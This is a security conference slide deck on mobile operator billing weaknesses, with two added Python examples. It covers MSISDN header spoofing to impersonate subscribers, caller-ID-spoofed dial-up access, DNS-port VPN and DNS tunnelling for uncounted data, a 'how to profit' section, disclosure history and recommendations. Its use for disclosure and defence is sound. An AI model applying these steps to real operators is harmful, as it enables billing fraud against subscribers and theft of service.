Internet Services
Mobile networks: exploiting HTTP headers and data traffic
Bogdan ALECU
Jan 19, 2015
About me
• Independent security researcher
• Sysadmin
• Passionate about security, especially when it's related to mobile devices; CISSP, CEH, CISA, CCSP
• Started with NetMonitor (thanks Cosconor), continued
with VoIP and finally GSM networks / mobile phones
• @msecnet / www.m-sec.net
Bogdan Alecu December 2012
This talk is NOT about
• SQL Injection, Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF) or anything of the kind

• Any demo that will be shown has to be treated just as an example and nothing more
• I have no intent to discredit any of the operators
• This is just a heads-up, to raise security awareness among users, programmers and mobile operators
Mobile operators have their own WAP / WEB page for customers:
• Balance check
• Money transfer
• Download music, videos, wallpapers, etc.
• Subscribe to services (e.g. custom ringback tones)
Usually the page is available only from a mobile phone
HOWEVER...
User Agent Switcher - https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/
User Agent Switcher – impersonate the browser to pretend that you're actually browsing from a phone
Description: NokiaE71
User Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE71-1/110.07.127; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
App Code Name: Series 60
App Name: Browser
App Version: Series60/3.1
Platform: E71
Vendor: Nokia
User Agent Switcher
• not much to do: just browse the mobile version of the site
• could be used to get around a data plan that is restricted to mobile-phone browsing
• no access to your subscriptions
Some sites serve application/vnd.wap.xhtml+xml content
• XHTML Mobile Profile
• https://addons.mozilla.org/en-US/firefox/addon/xhtml-mobile-profile/
How do the mobile operators know who should be charged?
• Once you connect to the Internet, the operator knows your mobile number
  - no attack here; the number can't be spoofed
  - physical access to another SIM would be necessary
• They use specific HTTP headers to send the number to the web site
  - used especially for 3rd-party websites
  - the header names are hard to find
  - the headers can easily be attacked / changed
How do the mobile operators know who should be charged? - HTTP headers
Where are the headers coming from?
1. Your phone's browser
2. Operator's proxy
• Tested around 20 operators from Romania, Germany, Austria, Italy, France, Poland, United Kingdom, Brazil, Netherlands
• No user has been affected, as for most of the tests I had my own SIM card
• Some tests could not be fully performed
• Discovered in January 2012
• First report in March to an affected mobile operator
• Reported to GSMA in April (later got confirmation from different operators that GSMA issued a warning)
• Most of the operators responded quickly and also fixed the vulnerability
• Informed operators and GSMA about this public disclosure
How do the mobile operators know who should be charged? - HTTP headers
How to find the headers?
1st idea: - connect your phone to the computer and sniff the traffic
          - find the names of the headers where the phone number is stored
          - headers might be specific to each carrier
          - find a way to modify the value of the headers
          - ATTACK!
1st idea - result:
FAIL!
How do the mobile operators know who should be charged? - HTTP headers
How to find the headers?
2nd idea: - search the web for headers
          - headers might be specific to each carrier
          - find a way to modify the value of the headers
          - ATTACK!
That's good, but there must be something more!
Found a paper called "Privacy Leaks in Mobile Phone Internet Access" by Collin Mulliner -
http://www.mulliner.org/collin/academic/publications/mobile_web_privacy_icin10_mulliner.pdf
How do the mobile operators know who should be charged? - HTTP headers
Chosen HTTP headers:
o X-UP-CALLING-LINE-ID
o X_FH_MSISDN
o MSISDN
o X-MSISDN
o X-NOKIA-MSISDN
o M
o X_NETWORK_INFO
How do the mobile operators know who should be charged? - HTTP headers
- find a way to modify the value of the headers
Modify Headers – Firefox Extension
https://addons.mozilla.org/en-US/firefox/addon/modify-headers/
Action: Modify
Value: the target's mobile number in E.164 format
• We have the headers
• We know how to change them
• We know how to impersonate the browser
The attack:
1. From inside of the mobile operator network
2. From outside of the mobile operator network (2 types)
1. From inside of the mobile operator network
Steps:
a) Use a GSM modem and SIM card
b) Configure the profile (APN) settings to match those of your operator
c) Connect to the Internet and change the User Agent to match a mobile phone browser
d) Inject HTTP headers with the MSISDN of the target
DEMO
• "It just works!"
• No need to know any complicated password
2. From outside of the mobile operator network (2 types)
2a) Use your own Internet connection
• Connect to the Internet and change the User Agent to match a mobile phone browser
• Inject HTTP headers with the MSISDN of the target
Things I noticed after these 2 types of attack:
• The attack works either on the operator's website, on the 3rd-party site, or on both
• Some operators let you access their mobile site only if you are connected to their network, while others do not have such a restriction
• Sometimes you also need to set the operator's proxy in order to set a different MSISDN in the HTTP headers
• A few have implemented a unique session ID for each connection instead of the phone number
• Just one operator from the ones I tested was ignoring any additional headers sent, but there might be others that do that
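The exchange behind attacks 1 and 2a, as an added Python example that is not part of the original slides and not any operator's code: the request the attacker's browser sends (mobile User-Agent plus an injected X-MSISDN), a lax versus a strict operator proxy, and the portal-side decision of which number to bill, with and without the source-IP check from the recommendations. The header names and the Nokia E71 User-Agent come from the slides; the proxy address range 10.0.0.0/8, the numbers +40700000001 / +40700000099, the host wap.operator.example and the request itself are constructed assumptions.

```python
"""Added example (not from the slides, not any operator's code): the MSISDN
header injection attack, a lax vs. strict operator proxy, and the portal-side
billing decision with and without a source-IP check."""
import ipaddress
from typing import Dict, Optional

# Header names the portal honours for the subscriber number (from the slides).
MSISDN_HEADERS = ("x-msisdn", "x-up-calling-line-id", "msisdn")
# Assumption (constructed): addresses the operator's proxy/gateway connects from.
OPERATOR_PROXY_NET = ipaddress.ip_network("10.0.0.0/8")
VICTIM = "+40700000001"        # constructed target number (E.164)
ATTACKER_SIM = "+40700000099"  # constructed: the attacker's own SIM

# Constructed: the request the attacker's browser sends after User Agent Switcher
# (Nokia E71 profile from the slides) and Modify Headers have done their work.
ATTACK_REQUEST = (
    b"GET /myaccount/subscriptions HTTP/1.1\r\n"
    b"Host: wap.operator.example\r\n"
    b"User-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE71-1/110.07.127; "
    b"Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413\r\n"
    b"X-MSISDN: +40700000001\r\n"
    b"\r\n"
)


def parse_headers(raw: bytes) -> Dict[str, str]:
    """Header names lower-cased, values stripped; request line and body ignored."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return headers


def proxy_forward(headers: Dict[str, str], subscriber: str, strict: bool) -> Dict[str, str]:
    """Model of the operator's gateway adding the subscriber number on the way out.
    Lax: only fills in the header when the client did not send one, so an injected
    value survives. Strict: drops every inbound MSISDN header and writes its own."""
    out = dict(headers)
    if strict:
        for name in MSISDN_HEADERS:
            out.pop(name, None)
        out["x-msisdn"] = subscriber
    else:
        out.setdefault("x-msisdn", subscriber)
    return out


def is_e164(number: str) -> bool:
    return number.startswith("+") and number[1:].isdigit() and 8 <= len(number) <= 16


def billed_msisdn_vulnerable(headers: Dict[str, str], remote_ip: str) -> Optional[str]:
    """What most tested portals did: whichever known header carries a number wins,
    no matter where the request came from (remote_ip is ignored on purpose)."""
    for name in MSISDN_HEADERS:
        if headers.get(name):
            return headers[name]
    return None


def billed_msisdn_hardened(headers: Dict[str, str], remote_ip: str,
                           session_msisdn: Optional[str] = None) -> Optional[str]:
    """The slides' recommendations: trust the header only when the request comes
    from the operator's own proxy addresses, otherwise fall back to a logged-in
    session (or bill nobody)."""
    if ipaddress.ip_address(remote_ip) in OPERATOR_PROXY_NET:
        for name in MSISDN_HEADERS:
            value = headers.get(name)
            if value and is_e164(value):
                return value
    return session_msisdn


def run_scenarios() -> Dict[str, Optional[str]]:
    h = parse_headers(ATTACK_REQUEST)
    lax = proxy_forward(h, ATTACKER_SIM, strict=False)     # attack 1 through a lax gateway
    strict = proxy_forward(h, ATTACKER_SIM, strict=True)   # attack 1 through a strict gateway
    return {
        "2a outside, vulnerable portal": billed_msisdn_vulnerable(h, "203.0.113.7"),
        "2a outside, hardened portal": billed_msisdn_hardened(h, "203.0.113.7"),
        "2a outside, hardened + login": billed_msisdn_hardened(h, "203.0.113.7", ATTACKER_SIM),
        "1 inside, lax proxy, vulnerable": billed_msisdn_vulnerable(lax, "10.1.2.3"),
        "1 inside, lax proxy, hardened": billed_msisdn_hardened(lax, "10.1.2.3"),
        "1 inside, strict proxy, hardened": billed_msisdn_hardened(strict, "10.1.2.3"),
    }


if __name__ == "__main__":
    for case, number in run_scenarios().items():
        print(f"{case:34s} -> billed {number}")
```

The "lax proxy" case is why attack 1 "just works" even against a portal that checks the source IP: if the gateway forwards whatever MSISDN header the handset sent, the IP check passes and the victim is still billed. The source-IP check only helps once the proxy strips client-supplied headers (the behaviour of the one operator that ignored additional headers).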
2. From outside of the mobile operator network (2 types)
2b) The old fashioned way ☺ aka CSD (Circuit Switched Data)
o Think about it like dial-up
o Since it involves actually placing a phone call, it is exposed to the same vulnerabilities as a regular call (e.g. caller ID spoofing)
2b) CSD
o 1st idea: - search for the CSD settings
            - see what can be changed
            - test
OOPS! I need to have Data Call enabled
Changing the username to match another number did not help
2b) CSD
o 2nd idea: - spoof the caller ID
            - connect to the Internet
            - test
DEMO
To be noted:
• On some operators you still have to send the HTTP headers
• Sometimes there was a poor way to detect if the call was coming from their network. Easy to get past it: first call a number from the network which has call forwarding set up to the CSD number
• Not all operators have a full CSD number available (e.g. only a short code like *231)
How to profit... and get caught
• Create an LLC (Limited Liability Company)
• Sign a partnership with the operators to provide 3rd-party web content on their portal
• Attack different users or just subscribe them to your services (yes, you can do that without asking for any permission)
• Profit
A few recommendations:
• Check if the web page is accessed from your network (source IP)
• Ignore any MSISDN header supplied by the client; only the value set by your own proxy should be trusted (as one of the tested operators already does)
• Do not rely solely on the Caller ID
• Implement username/password access for sensitive zones (like modifying active services)
• Send an SMS to the customer informing them that a purchase has been made, a service has been modified, etc.
• Be careful with the 3rd-party content providers
Conclusion:
• Sometimes there might be issues in the mobile operator's system:
"Our technology does not allow unauthorized access. Occurrence of errors in billing regarding data traffic is excluded." (Customer Support)
• Depending on the destination, the cost of the attack might be higher than the revenue
• Mobile operators reacted promptly
• Unfortunately there are still issues – mostly on 3rd-party services
• Check if your operator allows you to disable access to premium rate content
• Test yourself and report the issue to your operator
Data traffic vulnerability (2 types)
o You should be able to access the operator's webpage in order to top up or view account details even when you have no credit left, which means name resolution (DNS, UDP port 53) still has to be let through and is not counted
... But we can exploit this
1. Set up a VPN server on port 53, UDP (the DNS port)
   ... and connect to your server
   ... pass the traffic to the Internet
UNLIMITED & UNCOUNTED MOBILE DATA TRAFFIC!
2. DNS tunneling
What if:
- you had your own DNS server
- you delegated all DNS requests for a zone to your server
- you encapsulated the traffic in the replies
WAIT! THERE IS A WAY!
Delegate a sub-zone to your own server:
a.sub.domain.com. IN NS sub.domain.com.
sub.domain.com. IN A 79.122.100.20 (your IP)
Request: www.google.com.up.a.sub.domain.com
Answer: www.google.com.down.a.sub.domain.com IN AAAAlAgfAAAAgQDKrd3sFmf8aLX6FdU8ThUy3SRWGhotR6EsAavqHgBzH2khqsQHQjEf355jS7cTG+4a8kAmFVQ4mpEEJeBE6IyDWbAQ9a0rgOKcsaWwJ7GdngGm9jpvReXX7S/2oqAIUFCn0M8=
- Already built solution: Iodine
http://code.kryo.se/iodine/ (for Linux, Windows, Android)
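The encoding side of the tunnel described above, as an added Python example that is neither from the slides nor from iodine. Outbound bytes are base32-encoded and split into DNS labels under the delegated zone (names in the style of www.google.com.up.a.sub.domain.com, kept within the 63-byte label and 253-byte name limits of RFC 1035); inbound bytes come back base64-encoded as in the slide's answer record; a small heuristic at the end shows what an operator could log on. Sequence numbers, retransmission and the actual UDP sockets are left out. The zone a.sub.domain.com and the sample HTTP request/response are constructed.

```python
"""Added example (not from the slides, not iodine): how bytes are carried in
DNS query names (upstream) and answer data (downstream) by a DNS tunnel."""
import base64
from typing import List, Tuple

TUNNEL_ZONE = "a.sub.domain.com"   # constructed: the zone delegated to the tunnel server
MAX_LABEL = 63                      # RFC 1035: label length limit
MAX_NAME = 253                      # RFC 1035: name length limit (presentation form)


def encode_upstream(payload: bytes, zone: str = TUNNEL_ZONE) -> List[str]:
    """Turn payload into one or more query names <data labels>.up.<zone>.
    Base32 is used because DNS names are case-insensitive; its '=' padding is
    dropped here and restored on decode. Every name respects both limits."""
    text = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
    suffix = ".up." + zone
    queries: List[str] = []
    pos = 0
    while pos < len(text):
        labels: List[str] = []
        name_len = len(suffix)
        while pos < len(text):
            chunk = text[pos:pos + MAX_LABEL]
            cost = len(chunk) + (1 if labels else 0)   # +1 for the separating dot
            if name_len + cost > MAX_NAME:
                break
            labels.append(chunk)
            name_len += cost
            pos += len(chunk)
        queries.append(".".join(labels) + suffix)
    return queries


def decode_upstream(queries: List[str], zone: str = TUNNEL_ZONE) -> bytes:
    """What the tunnel server does: strip the zone, join the labels, undo base32."""
    suffix = ".up." + zone
    text = ""
    for name in queries:
        if not name.endswith(suffix):
            raise ValueError("not a tunnel query: " + name)
        text += name[:-len(suffix)].replace(".", "")
    text = text.upper() + "=" * (-len(text) % 8)
    return base64.b32decode(text)


def encode_downstream(payload: bytes) -> str:
    """Server side: the answer data is base64, as in the slide's answer record."""
    return base64.b64encode(payload).decode("ascii")


def decode_downstream(rdata: str) -> bytes:
    return base64.b64decode(rdata)


def is_suspicious_query(name: str) -> bool:
    """Cheap indicator an operator could alert on: tunnel names are long and made
    of long, random-looking labels. Heuristic only; some CDN names also trip it."""
    return len(name) > 100 or max(len(label) for label in name.split(".")) > 40


def round_trip(request: bytes, response: bytes) -> Tuple[List[str], bytes, bytes]:
    """Client encodes an HTTP request into queries, the server decodes it and
    answers with the base64 response, the client decodes that back."""
    queries = encode_upstream(request)
    seen_by_server = decode_upstream(queries)
    answer = encode_downstream(response)
    seen_by_client = decode_downstream(answer)
    return queries, seen_by_server, seen_by_client


if __name__ == "__main__":
    # Constructed sample traffic: a plain HTTP GET and a short reply.
    req = b"GET / HTTP/1.1\r\nHost: www.google.com\r\n\r\n"
    resp = b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"
    qs, up, down = round_trip(req, resp)
    for q in qs:
        print(f"{len(q):3d} chars  suspicious={is_suspicious_query(q)}  {q}")
    assert up == req and down == resp
```

A real tunnel also has to number and acknowledge chunks, because DNS queries may be reordered, dropped or cached by the operator's resolver; that is the part iodine adds on top of the encoding shown here. On the operator side, the same label and name lengths the encoder has to respect are what makes tunnelled queries stand out in resolver logs.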
THANK YOU!
Special thanks to:
Tobias Engel
Collin Mulliner
all security guys from mobile operators